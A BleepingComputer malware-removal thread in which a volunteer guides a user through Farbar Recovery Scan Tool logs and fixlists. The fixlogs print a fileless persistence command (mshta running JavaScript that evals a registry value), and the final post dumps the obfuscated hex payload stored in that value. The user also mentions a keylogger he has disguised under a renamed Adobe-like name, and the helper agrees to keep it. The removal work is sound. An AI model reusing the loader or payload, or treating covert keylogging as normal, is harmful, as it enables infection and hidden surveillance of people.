2017-03-08 15:17 - 2017-03-08 17:04 - 00000000 ____D C:\Users\User\AppData\Local\YgfPack
2017-03-08 15:17 - 2017-03-08 15:21 - 00000000 ___HD C:\Users\User\AppData\Local\SysHashTable
2017-03-08 15:13 - 2017-03-08 15:13 - 00000000 ____D C:\Users\User\Downloads\Why Him 2016
2017-03-08 15:12 - 2017-03-08 15:12 - 00032990 _____ C:\Users\User\Downloads\Why Him 2016.torrent
2017-03-08 09:42 - 2017-03-08 09:42 - 00043034 _____ C:\Users\User\Documents\if-a-man-lays-with-another-man-thou-should-be-high_o_2561505.webp
2017-02-27 05:41 - 2017-02-27 05:41 - 01129376 _____ (Google Inc.) C:\Users\User\Downloads\ChromeSetup (1).exe
2017-02-27 05:41 - 2017-02-27 05:41 - 00002346 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-27 05:41 - 2017-02-27 05:41 - 00002334 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-02-26 17:51 - 2017-02-26 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Easy Video Maker
2017-02-26 17:51 - 2017-02-26 17:51 - 00000000 ____D C:\Program Files (x86)\Easy Video Maker
2017-02-26 17:50 - 2017-02-26 17:50 - 47273719 _____ (Easy Video Maker ) C:\Users\User\Downloads\easyvideomaker.exe
2017-02-26 17:21 - 2017-02-26 17:21 - 47982421 _____ C:\Users\User\Downloads\ffmpeg-20170225-7e4f32f-win64-static.zip
2017-02-26 17:20 - 2017-02-26 17:21 - 118617974 _____ C:\Users\User\Downloads\Kdenlive-16.12.1-w64.zip
2017-02-24 05:35 - 2017-02-24 05:35 - 00003140 _____ C:\Users\User\Documents\cc_20170224_053527.reg
2017-02-21 22:55 - 2017-02-21 22:56 - 00000184 _____ C:\Users\User\Desktop\Facebook.url
2017-02-16 17:31 - 2017-03-09 06:15 - 00000000 ____D C:\Users\User\Desktop\Cindi
2017-02-13 07:51 - 2017-02-13 07:51 - 03752131 _____ C:\Users\User\Downloads\Welcome-to-the-Jungle-Print.pdf
2017-02-13 07:50 - 2017-02-13 07:50 - 01401603 _____ C:\Users\User\Downloads\END-YOUR-ADDICTION-pdf.pdf
2017-02-13 00:28 - 2017-02-13 00:28 - 00001384 _____ C:\Users\User\Documents\cc_20170213_002804.reg
2017-02-10 12:29 - 2017-02-10 12:29 - 00000000 ____D C:\Users\User\Documents\Apowersoft
2017-02-10 12:28 - 2017-02-10 12:29 - 00000000 ____D C:\Users\User\AppData\Roaming\Apowersoft
2017-02-10 12:28 - 2017-02-10 12:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apowersoft
2017-02-10 12:28 - 2017-02-10 12:28 - 00000000 ____D C:\Program Files (x86)\Apowersoft
2017-02-10 12:28 - 2017-01-02 15:01 - 00370424 _____ (Riverbed Technology, Inc.) C:\WINDOWS\system32\wpcap.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00282360 _____ (Riverbed Technology, Inc.) C:\WINDOWS\SysWOW64\wpcap.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00107768 _____ (Riverbed Technology, Inc.) C:\WINDOWS\system32\Packet.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00098040 _____ (Riverbed Technology, Inc.) C:\WINDOWS\SysWOW64\Packet.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00053299 _____ C:\WINDOWS\SysWOW64\pthreadVC.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00036600 _____ (Riverbed Technology, Inc.) C:\WINDOWS\system32\Drivers\npf.sys
2017-02-10 12:19 - 2017-02-10 12:19 - 64342824 _____ (APOWERSOFT LIMITED ) C:\Users\User\Downloads\video-download-capture.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-03-09 13:07 - 2016-08-30 14:41 - 00000000 ____D C:\FRST
2017-03-09 11:59 - 2016-09-22 20:20 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-03-09 06:13 - 2017-01-23 03:51 - 00000000 ____D C:\Users\User\Desktop\mp3
2017-03-09 05:38 - 2016-09-21 00:19 - 00000000 ____D C:\Users\User\AppData\Roaming\uTorrent
2017-03-09 05:37 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-03-09 05:37 - 2016-07-16 03:45 - 00000000 ____D C:\WINDOWS\INF
2017-03-09 05:34 - 2016-12-27 22:20 - 00000000 ____D C:\ProgramData\YTD Video Downloader
2017-03-08 19:05 - 2017-02-05 15:31 - 00000000 ____D C:\Users\User\AppData\Roaming\eM Client
2017-03-08 17:54 - 2016-02-21 19:56 - 02491196 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-03-08 17:50 - 2017-01-24 13:49 - 00250816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-08 17:50 - 2017-01-19 16:10 - 00000000 ____D C:\ProgramData\VMware
2017-03-08 17:50 - 2016-09-22 20:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-03-08 17:49 - 2016-07-15 22:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2017-03-08 17:08 - 2016-07-16 03:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-03-08 17:08 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-03-08 15:17 - 2016-09-23 22:35 - 00000000 ____D C:\Users\User\AppData\Roaming\vlc
2017-03-08 15:16 - 2016-09-21 00:19 - 00000000 ____D C:\Users\User\AppData\LocalLow\uTorrent
2017-03-05 04:25 - 2016-11-24 19:19 - 00000000 ____D C:\Users\User\AppData\LocalLow\Mozilla
2017-03-05 04:21 - 2016-11-24 18:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-03-05 04:21 - 2016-09-25 18:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-05 04:21 - 2014-09-05 00:41 - 00000000 ____D C:\Users\User\AppData\LocalLow\Temp
2017-03-04 22:16 - 2016-08-16 03:07 - 00000000 ____D C:\Users\User\AppData\Local\ElevatedDiagnostics
2017-03-04 18:58 - 2016-07-16 03:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-03-04 18:56 - 2016-07-28 05:38 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-02-28 22:19 - 2016-09-23 23:40 - 00000000 ____D C:\Users\User\Desktop\Saved_files
2017-02-27 05:52 - 2016-02-21 19:53 - 00000000 ____D C:\Users\User\AppData\Local\Packages
2017-02-27 05:41 - 2016-02-26 06:39 - 00000000 ____D C:\Program Files (x86)\Google
2017-02-26 17:50 - 2016-09-23 19:03 - 00000000 ____D C:\Users\User\AppData\Local\Downloaded Installations
2017-02-23 04:08 - 2017-01-19 16:05 - 00000000 ____D C:\Users\User\AppData\Roaming\Andy
2017-02-23 03:41 - 2017-01-19 16:14 - 00000000 ____D C:\Users\User\AppData\Roaming\VMware
2017-02-22 20:40 - 2016-02-21 21:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-22 20:37 - 2016-02-21 21:59 - 138020592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-21 20:11 - 2016-07-16 03:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-21 14:02 - 2016-03-29 06:28 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-19 11:05 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-02-18 12:04 - 2017-01-26 13:48 - 00003274 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-02-18 12:04 - 2016-02-21 19:56 - 00002402 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-18 12:04 - 2014-03-27 05:25 - 00000000 ___RD C:\Users\User\OneDrive
2017-02-18 06:39 - 2016-09-21 22:44 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-14 19:10 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-02-14 19:10 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-02-11 12:54 - 2017-01-19 16:05 - 00000000 ____D C:\Users\User\Andy
2017-02-09 17:31 - 2016-09-22 20:23 - 00000000 ____D C:\ProgramData\Package Cache
2017-02-07 12:45 - 2014-08-26 01:49 - 00000458 _____ C:\Users\User\.swfinfo
2017-02-07 07:48 - 2017-01-18 13:33 - 00000000 ____D C:\Users\User\AppData\Roaming\Stellarium
 
==================== Files in the root of some directories =======
 
2016-09-04 00:09 - 2016-09-04 00:13 - 0007607 _____ () C:\Users\User\AppData\Local\resmon.resmoncfg
2016-09-23 15:56 - 2016-09-23 15:56 - 0000016 _____ () C:\ProgramData\mntemp
2016-09-23 15:56 - 2016-09-23 15:56 - 0005116 _____ () C:\ProgramData\rxsmznjf.zcp
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-03-08 03:24
 
==================== End of FRST.txt ============================
 
 
Thanks in advance for any help you can give me. 
ps In case you're wondering... Yes I am running a keylogger and just renamed it Adobe Covert54 or something similar. 
 


BC AdBot (Login to Remove)

 


#2 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 09 March 2017 - 10:30 PM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Please attach Addition.txt.

Thanks!

 

 

Regards,

Georgi


cXfZ4wS.png


#3 captivekangaroo

captivekangaroo
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 09 March 2017 - 10:36 PM

I apologize. I thought I had attatched this already Attached File  Addition.txt   48.41KB   5 downloads 



#4 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 10 March 2017 - 04:31 PM

Hello,

 

 

 

Please go ahead and uninstall the following program from the Control Panel:

YTD Video Downloader 5.8.2 => see here why. You can keep it installed if you like it but keep in mind it's bundled with adware.

 

 

Do you know what this program is => SWU? C:\Program Files\devnullnull2017\SWU\swu.exe => never heard of it

 

 

I'll try to avoid deleting your keylogger:
 

C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe => Your Keylogger

 

C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe => Your Keylogger

 

C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ime32.dll => Your Keylogger

HKLM\...\Policies\Explorer\Run: [localSPM] => C:\WINDOWS\runkey.exe [424592 2016-08-05] () => Your Keylogger

HKLM-x32\...\Run: [kbdsprt] => [X] => Your Keylogger (if the file is renamed the run value is no longer valid).

 

 

 

Let's remove the baddies

 

 

 

Please download the following file => Attached File  fixlist.txt   2.3KB   8 downloads and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

This script was written specifically for you, for use on that particular machine.

 

Let me know how are things after the fix above.

 

 

Regards,

Georgi


cXfZ4wS.png


#5 captivekangaroo

captivekangaroo
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 11 March 2017 - 01:58 PM

Georgi, 

Thanks so much for taking the time to help me with my computer problems. 

 

In answer to your question, "Do you know what this program is => SWUC:\Program Files\devnullnull2017\SWU\swu.exe => never heard of it" , I came up with this:

 

swu.exe is a Sweex WiFi Utility belonging to Sweex Europe BV. Sweex WiFi Utility is a Windows application. It was created for Windows by Sweex. Please follow http://www.sweex.com if you want to read more on Sweex WiFi Utility on Sweex's website. Sweex WiFi Utility is typically set up in the C:\Program Files\Sweex folder, but this location may vary a lot depending on the user's choice while installing the application. You can uninstall Sweex WiFi Utility by clicking on the Start menu of Windows and pasting the command line RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\11\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{356D234E-3AD4-4495-B5CD-9AC1C05A19C8}\setup.exe" -l0x9 -removeonly. Keep in mind that you might receive a notification for administrator rights. The application's main executable file is labeled swu.exe and occupies 584.00 KB (598016 bytes).

Sweex WiFi Utility is comprised of the following executables which occupy 3.68 MB (3859360 bytes) on disk:

 

  • Autoswitch.exe (28.00 KB)
  • CleanOldInstall.exe (144.00 KB)
  • KILLW16.EXE (7.41 KB)
  • SMSetup.exe (52.00 KB)
  • swu.exe (584.00 KB)
  • AegisI2.exe (124.00 KB)
  • swu.exe (584.00 KB)
  • devcon.exe (54.50 KB)
  • setacl.exe (160.00 KB)
  • WinX64.exe (28.50 KB)
  • WRLSetup.exe (36.00 KB) "

 

As for the "devnullnull2017" I came up with this:

http://www.computerworld.com/article/3025497/linux/sending-data-into-the-void-with-dev-null.html. 

 

I have no clue if this helps or not. 

 

And as for taking your suggestion and deleting the program YTD Video Downloader 5.8.2, I was at first hesitant because I use it so much. When I initially installed it, I was careful to untick the options of installing the bundled software that was offered with it. But better safe than sorry so I uninstalled it. 

 

I ran the FRST.exe twice. This was because you said for the fix to be successful, the FRST64.exe and fixlist.txt must be in the same location. Well my FRST64.exe was located in the Downloads folder so I saved the fixlist.exe there also. When I initially ran the scan it was taking several hours so I thought I had made a mistake and stopped the scan (which generated the first Fixlog.txt *see below). I then moved both the FRST64.exe and fixlist.txt to the Desktop and ran the FRST64.exe from there. (which generated the second Fixlog.txt *see below). I hope I didn't mess anything up.

 

#1 Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-03-2017

Ran by User (10-03-2017 13:45:31) Run:1
Running from C:\Users\User\Downloads
Loaded Profiles: User (Available Profiles: User)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
C:\Users\User\AppData\Local\YclnPack
C:\Users\User\AppData\Local\YgfPack
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  -> No File
Folder: C:\ProgramData\Microsoft\Performance
C:\ProgramData\Microsoft\Performance
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-03]
Folder: C:\Users\User\AppData\Local\e97791
C:\Users\User\AppData\Local\e97791
Folder: C:\Users\User\AppData\Local\SysHashTable
Folder: C:\ProgramData\mntemp
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\exefile:  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\.exe: exefile =>  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\f27e02: "C:\WINDOWS\system32\mshta.exe" "javascript:hIz78KEX="LW";K7g=new ActiveXObject("WScript.Shell");EmG9IXS="Lqef";M86Tas=K7g.RegRead("HKCU\\software\\cvdsripecv\\mcnhngw");NV04AmW="3fOS9A";eval(M86Tas);n6iUI="gGU";" <===== ATTENTION
Reg: Reg Query "HKCU\software\cvdsripecv"
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\YclnPack => value not found.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\Ondbics => value not found.
C:\Users\User\AppData\Local\YclnPack => moved successfully
C:\Users\User\AppData\Local\YgfPack => moved successfully
 

#2 Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-03-2017

Ran by User (10-03-2017 17:38:03) Run:2
Running from C:\Users\User\Desktop
Loaded Profiles: User (Available Profiles: User)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
C:\Users\User\AppData\Local\YclnPack
C:\Users\User\AppData\Local\YgfPack
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  -> No File
Folder: C:\ProgramData\Microsoft\Performance
C:\ProgramData\Microsoft\Performance
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-03]
Folder: C:\Users\User\AppData\Local\e97791
C:\Users\User\AppData\Local\e97791
Folder: C:\Users\User\AppData\Local\SysHashTable
Folder: C:\ProgramData\mntemp
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\exefile:  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\.exe: exefile =>  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\f27e02: "C:\WINDOWS\system32\mshta.exe" "javascript:hIz78KEX="LW";K7g=new ActiveXObject("WScript.Shell");EmG9IXS="Lqef";M86Tas=K7g.RegRead("HKCU\\software\\cvdsripecv\\mcnhngw");NV04AmW="3fOS9A";eval(M86Tas);n6iUI="gGU";" <===== ATTENTION
Reg: Reg Query "HKCU\software\cvdsripecv"
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\YclnPack => value not found.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\Ondbics => value not found.
"C:\Users\User\AppData\Local\YclnPack" => not found.
"C:\Users\User\AppData\Local\YgfPack" => not found.
 
Again, thank you for your valuable help and as soon as I'm able I will donate. Times are tough right now. But rest assured I will not forget.
 
Sincerely,
Captivekangaroo


#6 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 11 March 2017 - 02:33 PM

Hello Captivekangaroo,

 

 

Thank you for the clarification regarding swu.exe. It is a part of your WiFi configuration Utility and it seems trustworthy.

 

However we should run the fix again since I made a mistake by including a temp hive loaded by Malwarebytes and that's why the fix was not successful. (I am sorry for the inconvenience).

 

And don't worry about donations. Your gratitude is enough to make me smile. :)

 

Please download the following file => Attached File  fixlist.txt   1.47KB   2 downloads and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

This script was written specifically for you, for use on that particular machine.

 

Let me know how are things after the fix above.

 

 

Also please run a new scan with FRST and attach the results in your next reply.

Thanks!

 

 

Regards,

Georgi


cXfZ4wS.png


#7 captivekangaroo

captivekangaroo
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 12 March 2017 - 09:09 PM

(3 of 3 parts)
 
========= Reg Query "HKCU\software\cvdsripecv" =========
 
 
HKEY_CURRENT_USER\software\cvdsripecv
    hzhngcwsh    REG_SZ    &d…EE˜"sR•g¡š`O'¤¤`Uø”‰
    mcnhngw    REG_SZ    JJKLQzFm4TTyoPNbUlHKLGST="xEfcxXKLZkn88xj4oy";eLjRwnPvScBMjo8x6Ht="mWpT4mplR8dGRb8xa5Ei83lC9A3l28DaQOC4vIbJ";DbD0fVleRLXUpHVJHQ="oUjNd1owRMDGS8XyP9abZCaeHtGpGDd07IA2UajUIFP";ZAHIWMdvIcqv4Yffb6uHLt="bIohY6GmnNtC7ur4bZjWG9j";JfCncRDCSWfyl1BRmRpwAg6Pw="8ri4ysLvgcPeBb2QnQmWLp";MaY7="053B281630157F29290D58331F1370307714754D117971383C233618265232300C28161F3E06190F3F07062C43057C51430E242376063B290C32391C1C0A76051B36632D0612557569536F7B173C6A0D3B3A023403526E0B3354013F2236084A3853114C033C0A050902352512080224252125091218453C0F17574E301B5F7A7007027F27206E4D1C38023B38186A3C27343602570917173A48340A43003B111D0B26341208103013130B34075D6C3A1C3F7A380D326B16751D70150F111D19151413382805316953220607583C39486D68011042240E51431C243D4B5E1D1C2E2505784B5D047B40780047477003305C1D244D04103C474775617C771963395C02001D4F252D0D3C4437227D1626161B1C7E666760111822011E7E350451270077184C5F2B0121172B234108363C011A3C3F2164490A280E0F00191C4667507D10211D5B176E5A454A3F2148135A311F14122448295A280331581910040278783D0E7E286A140A030A252725053D723A2F0A0419013C0D0808683C401B2131191B337204600618221F0D7841250723180F5C25043B7F2650371A5F5726603D043A3F1F210A0D3E533556025C3E7C233957134A79177E0B14320E055F7E263F3B3E59021F096C38221658390D380A080F2A1C470C20045A1D3D16393A0933180F36223C1C3E191D3D56152C05301D1C1209117D5E6A410E251322385628653B3D0C693D1F3B6B0356397C7509273E290303090720083332300E56241F0009152350384A45380942100A3B165857355332143E600D3A7C015D0F621B13107E366C0B15750D13625E131012071D320210090E323C5F3E16332F7E140E632D1439100A011200692A2324242D691C0D6C191C3703434E146B2E5D270B4334210B2D1B010214273E370C51083D201A3206152268064B5022214A08321074407C055A0038591E520F062F5E0F02210E1D692D5238055B161E06254638062D27310213583B552C18070B2B2350053C421620434E273D0A01501C2027130402230E067A04346643020B7F14540F1A020D161B03020006643C326A1C1B0F573C1B3D2301607911127D2E14100C3C640E416925247B382C1E530F07190037624224036F184A341A795125045602153A133608680C153508125A30233F2168011D5B212125150A11125A57353C20232D061536632F043176221E126B294A397C795427603D1B3B02601F310D00123632245F051940207E392C461514220D390E0A4A69255B2213223C250863271F0F76210E086F0C533415791B1C0700410C3F033920096F243632301F06232F1057054F5A161B1F123C017D5B572512273A291A2C0E5F7A0037664E0E3C6D734F340561121E00260413160F240912140D27365F2A3E192325503F2C671114311423150E6964340D223D291A220E730D1636480F263D6F084A0F1A7A121161391F3B160327271F1C140F57062B06093F2F512B02701014210E39643C58504127223D2C2432096C055C0F6647020D60144A0A0A5B0B1D0B21470B16033F310D3E0908223C0B2F1A0A1B713B3458101421140B647D5E50235A003B2C02530F731D2F31661B04037F14402226650D1E3E030203041B3A093414510F0B3C050009402C79113061220A3D0F32010A406A251204283D610A2071231C0F7621343C6E0C4934344F302004250438061825271C2E35093D245F3E194920673F2C5F160B25120C112846511B5F0F283D28150D637E0204034E023D55144C0A0A5B17263D2113163B25180F1D1C1436222C163E0D0E3E67153C4B2D1B42140C111249500B013E245806563F637A1B37762103036F77093715651126615A303B16132208233D08390B3C1A000915216801027C2D1B46103264125B7A1B017C353B3F0C0D590D5F375C030D380A73562A1C580A121B030003041F7D0A0D220A363D231A36092F3853054F5E201B254809117D5B7831200113040A100D061E0519723D263D6F084A0F1A7A121714031C03041F793E68360F20205F03007F372650612B4122211F010C1E1258513123383B2C1A0A087C1D15375D25423A7F174A240B7509273E2903030907200834171120092403000B15215115025E161B250D0C1102005225533E2307280E360706031C5D3D463B5610490C1A621210042902000631203119131123125A242D7C012768154306111D43330B3B1200572A203E38290233096C0900045F21073B7F10550D240225273E391F3D1603190E02180D27260158021F491E7B61385D15223E362B3B1E01511F247B103D691325732F1B365C4E1D3C4F7272277E530C27610B063D090F39091D292F2F09280707233F217B111250210B35013101755C57353C323A2C12100F06275C34664E02096C034A3A1A71141E1429473B621F793B0908340F0B3C032F1849326563340217211F0D3267745779375B3D2B2206153667330E0076310E006F73550A0A61180F152D013A63397C0A0D63143C312F1C30193F2068153C02167F394D38051665501C3C273A3C60013B05055C365C1B020309725E240B75182661211B03190335310931562834050506231527501A0A5D151D433322100A0550413827133F161C0F061D180C5C0F42096E367B0D05752426615E1F3806602824302A25083D20163E194C65601543462D1B1F0D243D205C57372C31125806123559331C0F693A1812603A610F0A61181E005E27003C2520326908562623521A367C01236B3F3C4125143D0232017559513A060F283D1E0936670A180466421C107B105F22264F171D61294738066C39273614160E22065F2F0D33367B3B16503818351C243D124857252C381213370F39072716317621031555104A0C0E7E1122071C391A381B3A093410110E2D2C030029491E78142C47177E351532037158573506792B3F610A0873231A0F793A4E137E0C0C0D7E650D2606290D3A63033832372254200E0E0300082B6051152F5D3D27420831650E46504053261529653E0D637F16185842213B560C513420612E1D0B3D073D3C03023102080E0E5738152D27126276031558150B1F0C0A647D5A50155A0012070656086C01191C7225213B560C513420612E1D0B3D073D3C03023102080E0E57381528251D3956174B5E100B1B0E3215235961403C7B24221A1035040D070F793D1B3A0B0F50251E022B263D350138630023211D6F500E221D1C350D113767611648100B250C243A0E01511C383B133D05133F637E5C0F693D013A7E0C550D236D111D61390D153A3D2409370812363320033E22493A663F2C0138194A11093B125A5731281F14321E5636637B19005F21023D7F2E4D341E022B263D3D1B3A3C6C3B3E680C18080806053E16342061153C472E0B0B143D3B125D783102042B3233123806011D0F663947107D2E4C0A0B7551273A04041317033908681C0C36305F070009156768074B5E100B1B0E321E094561403C7B253D06560D7372071E723D3F036010770C7F65502614393E00066027091D0F0827365F250620232353602F5D3E0B46490A11334362310D20253D690D086333001E621C07126B35523B057D171D61391C3D091F20200931560A345A24